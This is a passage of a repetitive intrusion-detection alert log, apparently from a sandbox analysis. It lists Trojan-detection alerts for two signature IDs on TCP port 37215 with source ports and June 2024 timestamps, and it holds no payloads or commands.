              SID:2829579
              Source Port:41496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167636
              SID:2835222
              Source Port:50384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911068
              SID:2835222
              Source Port:50260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318325
              SID:2835222
              Source Port:34350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279587
              SID:2835222
              Source Port:44504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975071
              SID:2829579
              Source Port:43592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659622
              SID:2835222
              Source Port:36220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267397
              SID:2835222
              Source Port:51712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127832
              SID:2835222
              Source Port:34558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.197607
              SID:2829579
              Source Port:44928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304130
              SID:2829579
              Source Port:41018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942771
              SID:2835222
              Source Port:56756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.269172
              SID:2829579
              Source Port:47720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610371
              SID:2829579
              Source Port:42794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106206
              SID:2835222
              Source Port:53222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990460
              SID:2835222
              Source Port:50264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509482
              SID:2835222
              Source Port:34422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888499
              SID:2829579
              Source Port:48656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090462
              SID:2835222
              Source Port:53474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107689
              SID:2835222
              Source Port:47020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303553
              SID:2829579
              Source Port:54120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988385
              SID:2829579
              Source Port:48656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305543
              SID:2829579
              Source Port:43574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054996
              SID:2829579
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369403
              SID:2829579
              Source Port:51330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785058
              SID:2829579
              Source Port:35004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869017
              SID:2829579
              Source Port:40552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553427
              SID:2835222
              Source Port:37270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301353
              SID:2835222
              Source Port:45804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403036
              SID:2829579
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279817
              SID:2829579
              Source Port:60654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214388
              SID:2835222
              Source Port:54138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093133
              SID:2835222
              Source Port:47610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572647
              SID:2835222
              Source Port:54268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544536
              SID:2829579
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546181
              SID:2829579
              Source Port:54328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942082
              SID:2829579
              Source Port:43838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937651
              SID:2829579
              Source Port:40648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790122
              SID:2829579
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611355
              SID:2829579
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193679
              SID:2835222
              Source Port:51802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176156
              SID:2835222
              Source Port:60920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027122
              SID:2835222
              Source Port:49708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230114
              SID:2829579
              Source Port:57754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837182
              SID:2829579
              Source Port:37698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977123
              SID:2829579
              Source Port:52588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044524
              SID:2829579
              Source Port:44600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211991
              SID:2835222
              Source Port:49846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273417
              SID:2835222
              Source Port:54936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697390
              SID:2835222
              Source Port:56592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350786
              SID:2829579
              Source Port:52752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545157
              SID:2829579
              Source Port:46888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870283
              SID:2829579
              Source Port:39334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348436
              SID:2829579
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749975
              SID:2829579
              Source Port:44016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085316
              SID:2829579
              Source Port:38230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159433
              SID:2835222
              Source Port:47184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264947
              SID:2829579
              Source Port:48106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356806
              SID:2835222
              Source Port:34074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678168
              SID:2835222
              Source Port:57754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270851
              SID:2835222
              Source Port:51912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570774
              SID:2835222
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800248
              SID:2829579
              Source Port:57178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695819
              SID:2829579
              Source Port:38922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611550
              SID:2829579
              Source Port:60110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672283
              SID:2835222
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160449
              SID:2835222
              Source Port:56582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452909
              SID:2829579
              Source Port:40320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402238
              SID:2829579
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543283
              SID:2835222
              Source Port:36594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090325
              SID:2829579
              Source Port:33662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404723
              SID:2829579
              Source Port:58772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605415
              SID:2835222
              Source Port:46934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307444
              SID:2829579
              Source Port:39428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993286
              SID:2835222
              Source Port:40240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212747
              SID:2829579
              Source Port:34042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629490
              SID:2829579
              Source Port:48976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264205
              SID:2835222
              Source Port:45082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671521
              SID:2835222
              Source Port:41278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945917
              SID:2835222
              Source Port:47930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224325
              SID:2835222
              Source Port:42212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869493
              SID:2829579
              Source Port:47216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997333
              SID:2835222
              Source Port:44396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755483
              SID:2835222
              Source Port:35162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476446
              SID:2829579
              Source Port:55984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759339
              SID:2829579
              Source Port:37494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174147
              SID:2835222
              Source Port:57272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369839
              SID:2829579
              Source Port:49480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078772
              SID:2835222
              Source Port:50412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543856
              SID:2835222
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568842
              SID:2829579
              Source Port:38872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670488
              SID:2829579
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041276
              SID:2835222
              Source Port:60774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506108
              SID:2829579
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152875
              SID:2835222
              Source Port:56248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677000
              SID:2835222
              Source Port:51884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040241
              SID:2835222
              Source Port:54854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402128
              SID:2835222
              Source Port:55722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074189
              SID:2835222
              Source Port:59690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455031
              SID:2829579
              Source Port:45704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710044
              SID:2829579
              Source Port:44598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297298
              SID:2829579
              Source Port:53980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408053
              SID:2829579
              Source Port:56272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945494
              SID:2829579
              Source Port:40330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241351
              SID:2829579
              Source Port:38158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224364
              SID:2829579
              Source Port:33594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174708
              SID:2829579
              Source Port:58584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304056
              SID:2835222
              Source Port:59134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252373
              SID:2835222
              Source Port:50246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264390
              SID:2829579
              Source Port:47750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478724
              SID:2835222
              Source Port:41338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727208
              SID:2829579
              Source Port:46530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154198
              SID:2835222
              Source Port:40472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888117
              SID:2829579
              Source Port:47958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992777
              SID:2835222
              Source Port:53858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370923
              SID:2835222
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866764
              SID:2835222
              Source Port:57160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048560
              SID:2829579
              Source Port:37462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079791
              SID:2835222
              Source Port:56946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229800
              SID:2835222
              Source Port:40288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841032
              SID:2829579
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213577
              SID:2835222
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307263
              SID:2829579
              Source Port:35482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708574
              SID:2835222
              Source Port:45924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754398
              SID:2835222
              Source Port:59426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835731
              SID:2829579
              Source Port:60890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610432
              SID:2835222
              Source Port:41372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867955
              SID:2835222
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420416
              SID:2829579
              Source Port:39710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306691
              SID:2829579
              Source Port:37572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952581
              SID:2835222
              Source Port:41300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181505
              SID:2829579
              Source Port:51690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321663
              SID:2829579
              Source Port:47576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726240
              SID:2829579
              Source Port:54800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241440
              SID:2835222
              Source Port:51868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731776
              SID:2835222
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377851
              SID:2835222
              Source Port:40064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456900
              SID:2835222
              Source Port:52402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941998
              SID:2829579
              Source Port:40766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099712
              SID:2829579
              Source Port:45436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840063
              SID:2835222
              Source Port:44492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635190
              SID:2835222
              Source Port:42110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610342
              SID:2835222
              Source Port:52384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938004
              SID:2829579
              Source Port:57028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565517
              SID:2835222
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870242
              SID:2829579
              Source Port:40856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551720
              SID:2835222
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322129
              SID:2829579
              Source Port:57912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359747
              SID:2835222
              Source Port:54992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782088
              SID:2829579
              Source Port:58394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247295
              SID:2835222
              Source Port:37530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403819
              SID:2829579
              Source Port:46266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551069
              SID:2829579
              Source Port:46636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757830
              SID:2835222
              Source Port:39298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309802
              SID:2835222
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823602
              SID:2835222
              Source Port:58378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174757
              SID:2835222
              Source Port:45158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676792
              SID:2835222
              Source Port:49248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936405
              SID:2829579
              Source Port:52822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275597
              SID:2829579
              Source Port:48552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677993
              SID:2835222
              Source Port:35868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757050
              SID:2829579
              Source Port:47090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941159
              SID:2829579
              Source Port:45804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308505
              SID:2835222
              Source Port:48636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101970
              SID:2835222
              Source Port:55084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094126
              SID:2829579
              Source Port:38076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123827
              SID:2829579
              Source Port:36926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943763
              SID:2835222
              Source Port:45202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802020
              SID:2829579
              Source Port:34464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457149
              SID:2829579
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614987
              SID:2829579
              Source Port:39396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546991
              SID:2829579
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436761
              SID:2829579
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456823
              SID:2835222
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674976
              SID:2829579
              Source Port:36148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836894
              SID:2835222
              Source Port:41066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695355
              SID:2835222
              Source Port:48132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756285
              SID:2829579
              Source Port:58862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343644
              SID:2829579
              Source Port:51550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348552
              SID:2835222
              Source Port:53824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109991
              SID:2829579
              Source Port:52564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369523
              SID:2829579
              Source Port:37556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028299
              SID:2829579
              Source Port:57588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421291
              SID:2835222
              Source Port:37854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836144
              SID:2835222
              Source Port:43186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247200
              SID:2835222
              Source Port:55436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213677
              SID:2835222
              Source Port:33440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222950
              SID:2829579
              Source Port:55118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307011
              SID:2835222
              Source Port:43708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749720
              SID:2835222
              Source Port:42608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409196
              SID:2829579
              Source Port:40252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154765
              SID:2829579
              Source Port:43038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758644
              SID:2829579
              Source Port:57176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989823
              SID:2835222
              Source Port:48246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405150
              SID:2835222
              Source Port:60136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440495
              SID:2829579
              Source Port:41950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508871
              SID:2835222
              Source Port:37854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554195
              SID:2835222
              Source Port:42982
              Destination Port:37215
